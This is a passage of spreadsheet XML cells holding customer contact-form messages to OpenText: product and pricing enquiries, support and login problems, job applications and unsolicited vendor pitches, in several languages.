Could someone contact me to discuss what your company could do to assist us in meeting our project objectives?_x000D_
</t>
  </si>
  <si>
    <t>Hello, i would like to have information regarding Opentext Composer Notes. We have some Notes Application that needs to be converted and i would like to know the pricing of the product._x000D_
_x000D_
Regards_x000D_
_x000D_
Eric Guerard</t>
  </si>
  <si>
    <t>We use Exstream 8.0 and Command Center 2.3 and I would like to access the support documentation to learn how to upgrade to a recent version (should be in the installation manuals of recent versions) and if there are recommendations as to the version we should target. Our HP Exstream Support Account Reference was EXSCGIINFOSW.</t>
  </si>
  <si>
    <t>What is the cost of the OpenText Contract Life-Cycle Management software module?</t>
  </si>
  <si>
    <t>Not Able to access support although we have contract for IGC360148</t>
  </si>
  <si>
    <t>Test only</t>
  </si>
  <si>
    <t>Bonjour, nous utilisons votre solution "Streamserve" pour les impressions depuis noter logiciel. Le contact commercial que nous avions a quitté Open Text. Nous cherchons à avoir un nouveau contact commercial dans le cadre d'un upgrade vers la version Streamserve V5 pour nos clients. Merci de votre retour, Cordialement,</t>
  </si>
  <si>
    <t>We are interested in the Documentum line of products.</t>
  </si>
  <si>
    <t>I need to terminate my contract with you in writing, but I do not know where to send the notice nor to whom.</t>
  </si>
  <si>
    <t>I'm interested in doing the janitorial work,  floor work ,and window cleaning of  all the Gordmans stores. We had these stores for nine years and when the new contractors took over they wouldn't sub contract. I'm very interested in getting my stores back and I can assure you that the Gordmans staff would be happy as well. Thank you for your time!</t>
  </si>
  <si>
    <t>We want to do an improvement project where we want to OCR the information from AP invoices and import that information into SAP.  This will save us efforts in our manual AP invoice data entry (or eliminate AP invoice data entry all together).  Would you be able to setup a WebEx demo of how OpenText can help?</t>
  </si>
  <si>
    <t xml:space="preserve">Requesting more information on eDocs DM product demos, and pricing for one attorney/user at our company. Priority high. </t>
  </si>
  <si>
    <t>(spanish) Conocer sus productos y como podemos integrarlos en nuestros sistemas</t>
  </si>
  <si>
    <t>I intend to by a licence for using the product in personal/private environment, not in office - need clarification on the maintenance fee - paid once or every year, valability/duration of the license, etc.</t>
  </si>
  <si>
    <t xml:space="preserve">Bom dia. Estamos. no Instituto Brasileiro de Governança Corporativa - IBGC, interessados em conhecer as ferramentas de gestão eletrônica de documentos da OpenText, mais especificamente as plataformas e ferramentas de gerenciamento de conteúdo corporativo (ECM). _x000D_
_x000D_
Ao longo dos mais de 20 anos de atuação do instituto, muito conteúdo foi produzido e publicado. Temos uma forte demanda, para apoiar o nosso crescimento no futuro, em organizar e gerenciar os arquivos e conteúdos produzidos, de modo a facilitar a busca e localização de conteúdos, bem como a sua efetiva e eficiente disseminação e disponibilização. _x000D_
_x000D_
Gostaria de entrar em contato para entender se as soluções de ECM da OpenText são aderentes às demandas do IBGC, demandas essas que não são apenas de adoção de um sistema, mas sobretudo de planejamento e implantação de estratégias de gestão do conhecimento, centradas em uma plataforma. _x000D_
_x000D_
Desde já agradeço o contato e aguardo retorno._x000D_
Atenciosamente,_x000D_
Eduardo Mattos   </t>
  </si>
  <si>
    <t>Looking for more information about out-of-the-box analytics capabilities, and how to expand those capabilities, with WEM implementation for MBFS (Mercedes-Benz Financial Services) client.</t>
  </si>
  <si>
    <t>Request for information(Release notes) on Release 7.5 of Vendor Invoice Management.</t>
  </si>
  <si>
    <t>OCR/ICR, Data Capturing.</t>
  </si>
  <si>
    <t>Estamos implementando no Brasil a solução Big Data Analytics da OpenText que nossa matriz na Espanha já utiliza. Gostaríamos de checar se no Brasil existe suporte para a plataforma e também se há algum tipo de treinamento, seja direto com vocês ou com parceiros credenciados, para instruir nossa equipe na utilização.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
Can you please send me more information and pricing for your cloud fax solution.  We are currently researching a replacement for our current solution and need to support approximately 650 fax’s.  We would want to port our existing numbers as well._x000D_
_x000D_
Please get back to me with the information so I can review and set up follow up calls/demo’s as needed._x000D_
_x000D_
Thank you</t>
  </si>
  <si>
    <t xml:space="preserve">OpenText Rights Management </t>
  </si>
  <si>
    <t>I am trying to download a test GTIN and it doesnt seem to be processing. It says it was scheduled for ~7PM last night but still in Processing state._x000D_
Please advise._x000D_
Regards.</t>
  </si>
  <si>
    <t>Hello Team,_x000D_
 _x000D_
We are, Citi Application Readiness Team, need your assistance in order to gather info about below application compatibility and support for Win 10 as part of Window 10 Readiness initiative. CITI Bank has been using  below software currently on Win 7 operating system and Citrix 6.5._x000D_
_x000D_
We would like to know whether the below listed application is compatible and supported even for Win 10 (64 Bit) or is there any other higher version of application which would be compatible for Win10. If you have not tested for Win 10, could you please provide us with a tentative date by when we can reach you._x000D_
_x000D_
Application Name : RightFax Print Processor x64_x000D_
 _x000D_
Thanks in Advance_x000D_
Salekin_x000D_
Citigroup Inc._x000D_
+91 22 3930 3341</t>
  </si>
  <si>
    <t>I am looking to transfer all our employee personnel files into an electronic format. We have been trying to do ourselves however it is taking us too long, I am seeking a speedier option. Data Protection is critical however.,</t>
  </si>
  <si>
    <t xml:space="preserve">Enquiry how to register my support </t>
  </si>
  <si>
    <t>I need a contact where we can send our BPM RFP</t>
  </si>
  <si>
    <t>Hello,  I am unable to login and I believe the email address that is having the new password sent to may be out of date.  Could the new password be sent to my email address._x000D_
_x000D_
Thank you</t>
  </si>
  <si>
    <t>Where can i download Birt I-Hub F-type?</t>
  </si>
  <si>
    <t>Hi,_x000D_
We are consultant service  provider company in Turkey. We are interested in your Document Management Module related with Documentum. We want to see your demo version for his platform. Hope to see you._x000D_
Thanks.</t>
  </si>
  <si>
    <t>I have worked with Global 360' s products, it was too good. G360Nx .Net version &amp; G360's Case manager java version. I wish to understand how it has transformed into OpenText. If I wish to pursue what products should I choose?_x000D_
_x000D_
Regards,_x000D_
Vikram Srinivasan</t>
  </si>
  <si>
    <t>I like to understand more about OpenText Brava integration with SharePoint as i am implementing a solution for a customer._x000D_
_x000D_
Thank you</t>
  </si>
  <si>
    <t>Request for quotation for OpenText Exceed 15</t>
  </si>
  <si>
    <t xml:space="preserve">I need to find out what Windows Server version is supported with version DM10? Also need to know what Microsoft SQL version is supported with version DM10. </t>
  </si>
  <si>
    <t xml:space="preserve">Conference call </t>
  </si>
  <si>
    <t>Pestering from the sales people.  Seriously, our renewal date is at the end of July and since April your people has been calling and e-mailing incessantly._x000D_
_x000D_
Kindly reduce the number of calls or e-mail to perhaps one a week.</t>
  </si>
  <si>
    <t>We are evaluating MRM products and would like a demo of your MRM product._x000D_
Thank you. _x000D_
Aaron Otte</t>
  </si>
  <si>
    <t>We need to add our new company prefix to the GXS Catalogue, (0191909) please advise so I can submit the GS1 certificate.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I am currently researching vendors to support NetApp Marketing Content Marketing &amp; Digital Asset Management.  Please have a rep contact me as soon as possible to discuss OpenText capabilities and a demo._x000D_
_x000D_
Thank you,_x000D_
Chanelle _x000D_
Office: (408) 419-5551</t>
  </si>
  <si>
    <t>Embed analytics into our core product which uses RDBMS and Elasticsearch</t>
  </si>
  <si>
    <t>Jobs in our fax press server are in retry or failed status since approx. 10:30 pm on 05/25/17, only about 1% of our jobs are actually sending from server.</t>
  </si>
  <si>
    <t>Estimate cost of hardware and software solution to migrate 48 DIDs currently served by Cisco CUCM via analog voice gateways to RightFax.</t>
  </si>
  <si>
    <t>Hi,_x000D_
We would like to have more information about your iBPMS Platform._x000D_
_x000D_
1- What are your available licensing models and prices for your BPM Suite (buy/support/annual fees, in USD or Canadian dollars)?_x000D_
_x000D_
2- Is your cloud infrastructure hosted in Canada?</t>
  </si>
  <si>
    <t>I am the lead faculty member who is coordinating a seminar at Syracuse University from July 7-9 on "Digital Content and E-Discovery".  I would like to get a subject matter expert from OpenText to be our featured keynote speaker the morning of July 8th from 9-10:30am.  This is a good opportunity to bring your company, its products/services, and its recent acquisitions (Documentum, LEAP, InfoArchive) to the university's attention.  Please contact me to begin to coordinate this speaker.  Thank you.  Dr. Scott Bernard</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, _x000D_
_x000D_
I see that your company is exhibiting at the Call Center Week, Las Vegas, 2017, therefore I am writing to check if you would be interested in acquiring the entire list of attendees contact information for your pre and post event marketing campaigns._x000D_
_x000D_
Our lists come with the following data fields : Company, contact name (First, Middle and Last name), title, website, telephone, fax, mailing address with street address, city, state, zip code, country code, Industry, Revenue, Employee size, Email address, LinkedIn URLs (wherever available)_x000D_
_x000D_
Besides, the list of attendees, we also specialize in building customized lists as per our client’s requirement. To give you an example we can help you with contact details of the folowing lead personas : _x000D_
_x000D_
•	Customer Support/Service executives_x000D_
•	Customer experience professionals_x000D_
•	Customer Relations Officers_x000D_
•	Customer Loyalty Officers_x000D_
•	Customer Engagement Professionals_x000D_
•	Customer Success execs_x000D_
•	Call Center/Contact Center Executives_x000D_
•	Help Desk Professionals_x000D_
•	Sales execs_x000D_
•	CIOs, CTOs etc. _x000D_
_x000D_
Please advise if we can connect on quick call to discuss this better. _x000D_
_x000D_
Look forward to your response._x000D_
 _x000D_
Best regards,_x000D_
 _x000D_
Alexis Schar_x000D_
Marketing consultant_x000D_
</t>
  </si>
  <si>
    <t>SymQuest is new to offering RightFax and launching the product next month. Myself and another Product Engineer need to register for online training in pre sales and sales of Rightfax. Please direct me to the right place to register. Thanks</t>
  </si>
  <si>
    <t>Looking to replace current on premise fax solution.  What I'm looking for is a system that can handle 250,000+ fax's/year and commit them into IBM FileNet Image Services CMS.</t>
  </si>
  <si>
    <t>Cloud fax pricing</t>
  </si>
  <si>
    <t>Sales: System integration with our existing application</t>
  </si>
  <si>
    <t>Hi, I was offered a position by OpenText in Frankfurt, but it seems at the moment they are not looking to take on mainly English speakers. Is it possible someone from HR could call me regarding a possible career with OT in the UK?_x000D_
_x000D_
I would be most grateful._x000D_
_x000D_
Many thanks in advance._x000D_
_x000D_
Ross</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
My name is Ryan Wilinski, and I am the Director of Communications at Advameg, Inc. I am contacting you because our organization is interested in purchasing the Eloquent.com domain for a project we are currently working on. Does your organization have plans for the domain, or would you be willing to discuss a sale?_x000D_
_x000D_
If I have reached the wrong person, I would greatly appreciate if you could point me in the right direction. I can be reached by email at ryan@advameg.com or by phone at (630) 890-5682. Thank you in advance, and I look forward to hearing from you!_x000D_
_x000D_
Regards,_x000D_
Ryan Wilinski</t>
  </si>
  <si>
    <t>Hey Team,_x000D_
_x000D_
I am a federal re-seller and I have an RFQ from my customer in the Department of Commerce / NOAA. They have recently switched from Windows 7 to 10 and are looking to purchase new OpenText Exceed TurboX licenses with Support. If someone could reach back out to me as soon as possible, I'd like to get a quote on these software products. You can reach me any time via my email, or by phone._x000D_
_x000D_
Thanks,_x000D_
Jason Gaviria</t>
  </si>
  <si>
    <t>job opportunity</t>
  </si>
  <si>
    <t>Want to learn more about Capture and whether it can support XFA PDF document type for imaging and OCR processing.</t>
  </si>
  <si>
    <t>Hi, I am researching possible solutions for a project where I would like to sync documents between our SharePoint online environment and OpenText WSMS. eDOCS seems like a solution. Could you please give me a call to discuss.</t>
  </si>
  <si>
    <t>Compra de Software Brava Reader</t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour, nous sommes en phase d'élaboration du budget pour l'acquisition d'un solution "OpenText™ Records Management eDOCS Edition (eDOCS RM)",_x000D_
est ce que vous pouvez nous informer et de nous donner juste une idée sur le tarif des licences, pour 20 utilisateurs?_x000D_
Trés Cordialement._x000D_
</t>
  </si>
  <si>
    <t>Sehr geehrte Frau Zarba,_x000D_
_x000D_
mein Name ist Daniel Lippok und als zukünftiger MBA-Absolvent der Hochschule Ludwigshafen am Rhein/Management Akademie Heidelberg (MAH) führe ich im Rahmen der Erstellung meiner Master-Thesis eine empirische Umfrage zum Thema "HR Business Partnering" durch._x000D_
_x000D_
Ich würde mich sehr freuen, wenn Sie meine Arbeit durch Ihre Teilnahme an meiner Umfrage unterstützen (Zeitaufwand: ca. 10 bis 15 Min.). Dazu einfach den Link https://www.umfrageonline.com/s/HRBP anklicken. Bitte fühlen Sie sich frei diese Umfrage in Ihrem Kollegen- und Bekanntenkreis zu streuen. Die Umfrage wird noch bis zum 05. Juni 2017 online sein._x000D_
_x000D_
Unter allen Teilnehmern werden fünf 25 €-Gutscheine von Amazon verlost. Um teilzunehmen zu können müssen Sie am Ende der Umfrage lediglich Ihre E-Mail-Adresse angeben._x000D_
_x000D_
Im Voraus vielen Dank für Ihre Unterstützung._x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
Daniel Lippok</t>
  </si>
  <si>
    <t>Subject: iHub Community website not accessible_x000D_
Hello there,_x000D_
_x000D_
May I know why the OpenText iHub community website (http://developer.actuate.com/community) is not accessible since yesterday?_x000D_
And there is/was no communication anywhere regarding maintenance._x000D_
_x000D_
Best regards,_x000D_
Zorawar Bains</t>
  </si>
  <si>
    <t>Request for Information of Free DWG Viewer</t>
  </si>
  <si>
    <t>Pour le compte d'un grand groupe, je réalise un Benchmark des solutions de numérisation et traitement automatisé des commandes clients (email &amp; fax). J'aurais aimé avoir des renseignements sur votre solution afin de voir si celle ci pouvait correspondre à leur besoin. Merci de me recontacter par mail afin de planifier un rendez-vous téléphonique..</t>
  </si>
  <si>
    <t>The Biogen US Marketing Operations department works with creative agency partners in defining and executing on multichannel marketing tactics.  Assets developed include but are not limited to print, web, digital, emails, video and photography._x000D_
Biogen would like to evaluate Digital Asset Management (DAM) providers who have the resources and capabilities that meet or exceed the needs and requirements._x000D_
I am planning for RFP activity for this requirement. Please reach out to me as early as possible to discuss further.</t>
  </si>
  <si>
    <t>We currently use a number of physical fax machines, and we're looking at efax options, but we need HIPAA compliance, and the HIPAA compliant version of virtual fax (SAAS) offerings are expensive.  So I'm investigating options, and requesting pricing</t>
  </si>
  <si>
    <t>I do not have the ability to open a new technical Question Ticket</t>
  </si>
  <si>
    <t>Enquiry about Open Text products</t>
  </si>
  <si>
    <t>Need to understand the Solution for Open text</t>
  </si>
  <si>
    <t xml:space="preserve">IT-reseller from Belgium looking for a distributor for " QuickScanPro EMC captiva". </t>
  </si>
  <si>
    <t>I have purchased Brava! Desktop. Receipt No:5626-5494-4052-2620._x000D_
Could you please send me the installation file and necessary installation instruction as soon as possible (within morning time of Indochina Time)? Because we need it urgently for our coming project._x000D_
_x000D_
Thank you very much.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
An international company RexSoft offers you website support services. _x000D_
I can provide you with any specific professionals at a monthly rate of 500$. _x000D_
You won’t need any specific staff in your house for a full time job on the permanent basis. _x000D_
I could provide you with specialists only in case you need them for a certain period of time. _x000D_
There is a good opportunity to try our website support services for free within a week._x000D_
We are ready to connect with you at any convenient time. _x000D_
Feel free to contact me as soon as you are available: _x000D_
T: +1 646 751 76 06 _x000D_
Email: bpokrovka@gmail.com_x000D_
_x000D_
Thank you for your time,_x000D_
Best regards,  _x000D_
Bogdan_x000D_
Business Development Manager_x000D_
T: +1 646 751 76 06 _x000D_
Email:   bpokrovka@gmail.com_x000D_
Cowley House, 12 Black Jack Street _x000D_
Cirencester, GL7 2AA, United Kingdom_x000D_
RexSoft Inc._x000D_
https://rexsoftinc.com_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Klären Optionen zur DMS Optimierung Bereich Energy/Grossprojekte Energie </t>
  </si>
  <si>
    <t>Billing enquiry</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir or Madam,_x000D_
_x000D_
My name is Matej Zahradnik and I work as a Business Development Manager/Sector Specialist for the ICT sector at CzechInvest – we are a governmental agency under the Ministry of Industry and Trade of the Czech Republic._x000D_
_x000D_
CzechInvest provides free-of-charge services to foreign companies that are entering the Czech market, or even just considering it. With this e-mail, I would like to offer your company our services, which include:_x000D_
•	Consultancy on potential financial support through investment incentives and other resources;_x000D_
•	Search for business property – offices, co-working spaces;_x000D_
•	Assistance with implementation of investment projects;_x000D_
•	Tailor-suited visits to the Czech Republic (reference visits at other companies, meetings with local and state governments, universities…);_x000D_
•	Aftercare services for foreign investors who are already operating in the Czech republic;_x000D_
•	Other services._x000D_
_x000D_
Please do not hesitate to contact me should you have any questions, or should you require our help in expanding to the CEE region._x000D_
Best regards,_x000D_
_x000D_
_x000D_
Matej Zahradnik_x000D_
Business Development Manager for ICT_x000D_
+420 296 342 672_x000D_
+420 724 315 037_x000D_
matej.zahradnik@czechinvest.org_x000D_
Stepanska 15, 120 00 Prague 2, Czech Republic_x000D_
www.czechinvest.org_x000D_
_x000D_
 	 	 	 	 </t>
  </si>
  <si>
    <t>We are in the process of assessing the need for a document and content management system within our department. Would someone be able to meet with us briefly, for an hour or so, to explain the OpenText software and how everything works?</t>
  </si>
  <si>
    <t>Form Solution query; would like to know more about how your workflows integrate with forms</t>
  </si>
  <si>
    <t>cannot open http://wwwprodpreweb01.opentext.net/file_source/OpenText/en_US/PDF/opentext-so-co-application-governance-archiving-microsoft-sharepoint-en.pdf (the overview on the aga product page)</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to apply for a position at Open Text, kindly advise me further. </t>
  </si>
  <si>
    <t>Enquiry on Content Suite Platform</t>
  </si>
  <si>
    <t>We are looking to integrate Brava with our workflow within our corporate Engineering Data Management tool which is web-based. Can you please provide some technical guide as to what is required to install this and cost breakdown on number of licences? Also wondering if we could get an evaluation licence for us to test the product in our sandpit area before rolling out to our production sites? I have downloaded the desktop version as an evaluation so I have confirmed the functionality of the software, it is the integration with our system that I am looking to view.</t>
  </si>
  <si>
    <t>Would like to review pricing for very basic Rightfax solution. 2 ports for Inbound and Outbound using SIP with Cisco UCM.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
When I try to access a file using brava reader, I receive an error "unable to load files" an update is required for Brava Reader, contact your supplier for an update._x000D_
OS: Windows 7 Enterprise_x000D_
Brava Reader version installed: 16.0.2.23</t>
  </si>
  <si>
    <t>Please email me the list of authorized partners/resellers in Indonesia.</t>
  </si>
  <si>
    <t>Hi, _x000D_
_x000D_
I am looking to split the user ID AU/CLEARGRAIN from Profarmer Grain (account # 445085) as we (Clear Grain Pty Ltd) is no linger part of the same business. Could you please advise how to action this?</t>
  </si>
  <si>
    <t>Estamos buscando una herramienta de administración de Desarrollo de Nuevos Productos y Control de Especificaciones.</t>
  </si>
  <si>
    <t xml:space="preserve">我不懂英文, 很多东西只能靠自己探索与学习,  我了解到欧盟组织与联邦对全球的提昌的支持活动以及莫忘人权的祈望 , 但让我很纳闷的是关于信息上的沟通了解 就全球来说有多少人懂得,而许多需要帮助的人又有多少人知道国际间的讯息与维护自身的权益 , 我是亲身体验到支持力量但却伸手无法取得, 我不知道如何是好也找不到可以协助我的单位, 我的公司已经面临崩裂 而我还不愿放弃的想解开关于国际援助的真实性 或许我是真的异想天开, 航天局 图书支持 开发者代码 数字支援 第三方合规协议 等等 这是我自己想出来的吗?  </t>
  </si>
  <si>
    <t xml:space="preserve">May 29, 2017_x000D_
Fabian Rodriguez_x000D_
Motocross, Arena cross 2018_x000D_
6770 Binghamton Rd._x000D_
Dixon, CA 95620_x000D_
707 624 5470_x000D_
Fabian_r40@yahoo.com_x000D_
@Fabianr40_x000D_
_x000D_
To who may concern, sponsorship opportunity for the motocross national championship and Arena cross championship. Get the chance and the desire to give back and support my organization, along with others help host the most popular events in the nation. Racing almost every weekend of the year with more than 35 different tracks, with multiple crowds and audience. More than 20,000 spectators per event, covered by newspapers, television, radios and all web media. We are anxiously looking forward on working together to represent your BRAND the best way possible. Like everyone knows motocross is a sport that involves a lot of spending.  For the right amount you can be doing publicity nation wide. _x000D_
Below are the details concerning this year sponsorship level. _x000D_
_x000D_
-	$18,000 banners with your name and logo, logo on teams shirt and racing gear.  Logo on the bike and helmet, mention sponsor in TV interviews radios and more._x000D_
</t>
  </si>
  <si>
    <t>Red Hat JBoss BPM Suite workflow development service requested_x000D_
_x000D_
We are looking for vendors in Texas with experience in delivering workflow development services using Red Hat JBoss BPM Suite for projects in the area. _x000D_
_x000D_
We are interested in such vendors with provable experience in turnkey projects in the cited platform._x000D_
_x000D_
Please contact me if you consider that you can deliver such services._x000D_
_x000D_
Best regards,_x000D_
_x000D_
Alan Silberman</t>
  </si>
  <si>
    <t>Good day. I was interviewed by Mr. Christopher Lorenzo for the Mapping Developer post last May 4 and was told that I should receive a feedback regarding my application within a week or two. May I know if this is the right time to know about the feedback for my application? Hoping to hear from you again. Thank you.</t>
  </si>
  <si>
    <t>CORDYS ADMIN REPOSITORY SERVICES AND MONITOR NOT STARTING IN SERVICES</t>
  </si>
  <si>
    <t>I would like to get a quote for a license for VAN-GXS in order to setup an EDI connection with a customer</t>
  </si>
  <si>
    <t>Bom dia, trabalhamos com 4 varejos e recentemente adquirimos o ERP Linx. Gostaria de uma proposta comercial para EDI automatizado com nossos clientes. E também pra parte bancária. _x000D_
Obrigafo</t>
  </si>
  <si>
    <t>Diskussion kring underhållsavtal Brava Enterprise. Vi är kund idag, men vill gärna inleda en dialog med lokala representanter. _x000D_
mvh_x000D_
Björn</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sirs,_x000D_
_x000D_
I inform you that Nexteer Automotive Poland Sp. Z o.o. resigned Easylink service (servise according to invoice 07448491702).Please confirm._x000D_
_x000D_
In there is no reply from your side till 31.5.2017, It is considered as effected since that date._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Best regards_x000D_
_x000D_
 	_x000D_
Marcin Sroka_x000D_
_x000D_
STRATEGIC BUYER_x000D_
Phone: +48 724-950-509, +48 32 218-58-46_x000D_
Towarowa 6, Tychy 43-100_x000D_
Poland_x000D_
marcin.sroka@nexteer.com_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Is there any trial version of the Documentum/Opentext products? so we can download &amp; learn more about the products.</t>
  </si>
  <si>
    <t xml:space="preserve">Dears;_x000D_
_x000D_
We have a plan to implement Data archiving solution in our Enterprise (Ethiopian Airlines) and we have been looking over your Archiving solution and we are very comfortable with _x000D_
Technical and functional things you included in your product. Our budget year is from July to June and now we need to refigure our Budget for next fiscal year (2017/18) for Data Archiving solution so that please send us your product price Quotes. Also please include Implementation and product cost in separate._x000D_
_x000D_
Looking forward to your replay._x000D_
_x000D_
Thanks_x000D_
Girum _x000D_
</t>
  </si>
  <si>
    <t>I neen an email to your accounting. We have received a letter from you regaring new bank details</t>
  </si>
  <si>
    <t>Request price for upgrade from CTD 6.0 with .NET extension to OPENTEXT GUPTA TEAM DEVELOPER 7.0</t>
  </si>
  <si>
    <t xml:space="preserve">Dear supplier,_x000D_
_x000D_
I hope you are well._x000D_
_x000D_
On 22.12.2016 our banking team has received a refund from your company quoting gross amount of -155.00_x000D_
Please supply a credit note relating to this refund or alternatively please supply a backup documentation relating to it._x000D_
_x000D_
Regards,_x000D_
Lukasz_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Does open text 10.5 msi install work on windows 7 64 bit ? _x000D_
Could I have a link from which I will be able to download the correct software for windows 7 64 bit  ? _x000D_
</t>
  </si>
  <si>
    <t>We are looking for an archiving solution for our data for both Structured and unstructured data (Email, Sharepoint, SAP, Data on Oracle &amp; SQL Databases RDBMS) and other file systems. so that we have seen most of the technical part for OpenText Information &amp; Data Archiving Solutions but now we need to know your Price quote. we are looking to buy your solution and please let us know the soonest possible._x000D_
_x000D_
Thanks_x000D_
Girum</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir./Madam,_x000D_
_x000D_
My name is Loan. I come from VietCAD company. _x000D_
Our company specialize in engineering and business software, providing solutions for CAD/CAM/CAE._x000D_
_x000D_
I have a customer who is interested in Brava! Desktop CXL software (Qty: 3 seats)._x000D_
_x000D_
I would like to know the price for us on behalf a reseller and also the price for end-user._x000D_
_x000D_
How can I buy Brava! Desktop CXL in Vietnam?_x000D_
_x000D_
Could you please give me some information about Brava! Desktop CXL?_x000D_
_x000D_
I hope to hearing from you soon._x000D_
_x000D_
Thanks you very much._x000D_
Loan Hoang Thi (Ms.)_x000D_
</t>
  </si>
  <si>
    <t>Hello, I changed my email address and after I logged in again all my assignments to my service contracts licenses and tickets are opend by me are gone. My email address (and  user id before the change was u.schwenker@smarterbusiness.de) Can you please reestablish the connection to my data or tell me what I need to do to get back access to this information._x000D_
Best regrads_x000D_
Udo</t>
  </si>
  <si>
    <t xml:space="preserve">hi,_x000D_
pls quote me Brava Reader </t>
  </si>
  <si>
    <t>can we have trial version to test?</t>
  </si>
  <si>
    <t>Around  3 years of experience in Software Industry with Quality Assurance and Manual, Functional, Automation Testing(selenium) of Web applications and Mobile applications developed in Web, Mobile, Client/Server environment using Agile methodology_x000D_
_x000D_
Currently looking for an opportunity in the field of Automation where I can apply my skill and Knowledge for the creating sophisticated tools for QE that can deliver a quality product</t>
  </si>
  <si>
    <t>May we know who are the local resellers here in Philippines? We have a client that needs upgrade on their existing Rightfax system.</t>
  </si>
  <si>
    <t>Broken link on your website._x000D_
On Page   http://www.opentext.com/what-we-do/products/opentext-solutions-for-microsoft/opentext-application-governance-and-archiving-for-microsoft-sharepoint_x000D_
_x000D_
Links to   http://wwwprodpreweb01.opentext.net/file_source/OpenText/en_US/PDF/opentext-so-co-application-governance-archiving-microsoft-sharepoint-en.pdf_x000D_
_x000D_
Should link to    http://www.opentext.com/file_source/OpenText/en_US/PDF/opentext-so-co-application-governance-archiving-microsoft-sharepoint-en.pdf</t>
  </si>
  <si>
    <t>Voces possuem o serviço de digitalização de voz, com indexação, e resumo por exemplo de uma reunião. Grata att</t>
  </si>
  <si>
    <t xml:space="preserve">I am agent looking for already made software for E-archiving for 100,000 doctor files in Nigeria, I just need software while I am agent working for you </t>
  </si>
  <si>
    <t>IMMIDITELY</t>
  </si>
  <si>
    <t>Regarding eDOCS DM - DM Server - DM Server crashes upon startup if Microsoft Update KB4015546, KB4015549, and KB4015552 is installed (Article ID:KB4933160) - Could you please supply the hotfix for DM 5.3.1? Thanks</t>
  </si>
  <si>
    <t>I have reported bug reports about 8th May 2017 And Till now I am Not given a confirmation reply that your report has been reached or other..?_x000D_
Kindly please take a look_x000D_
Waiting for responce _x000D_
Greets_x000D_
Raja Uzair Abdullah</t>
  </si>
  <si>
    <t>How come you come up when I type in WWW.Magellan.com/support_x000D_
are you so desperate to hear from people????</t>
  </si>
  <si>
    <t>Hi there, I've had contact from a client who is trying to read e-mail in your system using our product NVDA.  NVDA is a screen reading program for users who are blind.  It reads aloud all the text and information that a sighted user looks at visually on screen.  Can you please adivse whether any settings need to be changed in order for this to work?  She has advised that it won't read the icons or text she has already written (I am not familiar with your software myself).  If the icons are graphics representing things, for instance read / unread / forwarded etc, then NVDA can report these, if the graphics have alternate text or similar.  Most elements in most programming languages allow this.  NVDA is free to use, so you are most welcome to download it and test for yourselves if you do not already do this.  See https://www.nvaccess.org/download/_x000D_
_x000D_
Kind regards_x000D_
_x000D_
Quentin.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
My name is George Polzer with Everymans.ai.  I am reaching out to see if I can assist your company with any A.I. machine learning product development and related marketing, channel building or sales acceleration work._x000D_
_x000D_
Everymans.ai (http://everymans.ai) is a boutique marketing and A.I. enabling consultancy.  We find and implement A.I. based solutions and execute marketing campaigns for immediate impact to gain a competitive edge._x000D_
_x000D_
- Media outreach, messaging &amp; content development_x000D_
- Tradeshow attendance &amp; demand generation_x000D_
- International business development &amp; launch strategies_x000D_
- Competitive research &amp; go-to-market execution_x000D_
- Sales &amp; marketing automation/alignment_x000D_
_x000D_
If interested in exploring my expertise, please don't hesitate to pick a time for a call using my online calendar link below or email me at george@everymans.ai with any questions._x000D_
_x000D_
http://meetme.so/georgepolzer_x000D_
_x000D_
I look forward to hearing from you._x000D_
_x000D_
Regards,_x000D_
George Polzer_x000D_
Principal Consultant, Founder_x000D_
+1 480.278.5232_x000D_
george@everymans.ai"</t>
  </si>
  <si>
    <t>Hi Team,_x000D_
_x000D_
I thought I’d reach out early for Digital Pharma West to see if your events group needs printed hand-outs, signage, or promotional swag. Our San Francisco shop is conveniently located nearby and we’d be happy to deliver everything to the conference or your hotel before the event begins. Let me know how I can help!_x000D_
_x000D_
Thank you,_x000D_
Stephen Chen_x000D_
Sales &amp; Marketing_x000D_
Copymat Digibranch_x000D_
(415)981-1300_x000D_
stephen@copymat3.com</t>
  </si>
  <si>
    <t>Hello,_x000D_
We currently have a bunch of products under EMC Captiva. I would like to know who I may be able to contact regarding our current support licensing as well as future support licensing possibilities._x000D_
Thanks!</t>
  </si>
  <si>
    <t>I keep getting an error message when I try to install Brava Desktop IXL that states the serial number in the license file is invalid?_x000D_
_x000D_
Thanks, _x000D_
_x000D_
John</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, we currently have an account with you for our text but we need to open up GXS catalog. Please have someone email or call Tuesday 05/30. Thank you. </t>
  </si>
  <si>
    <t xml:space="preserve">what would be the procedure to get started with open text/gxs/catalog if starting with new company?  Thanks. </t>
  </si>
  <si>
    <t>Trying to retire a legacy PDM system.</t>
  </si>
  <si>
    <t>Hello! I am looking to learn more about your Media Management solution. Do you offer demos or anything like that?</t>
  </si>
  <si>
    <t>We are looking for a product that reads scanned documents and can auto populate the information into our system.</t>
  </si>
  <si>
    <t xml:space="preserve">Please copy my EMC support account kumari@mccarran.com access and privileges TO opentext support account kumari@mccarran.com._x000D_
_x000D_
opentext contract number 62893976D_x000D_
_x000D_
Thanks!_x000D_
</t>
  </si>
  <si>
    <t>Need to access our support area for issues. We recently subscribed and need to know how to get in thanks</t>
  </si>
  <si>
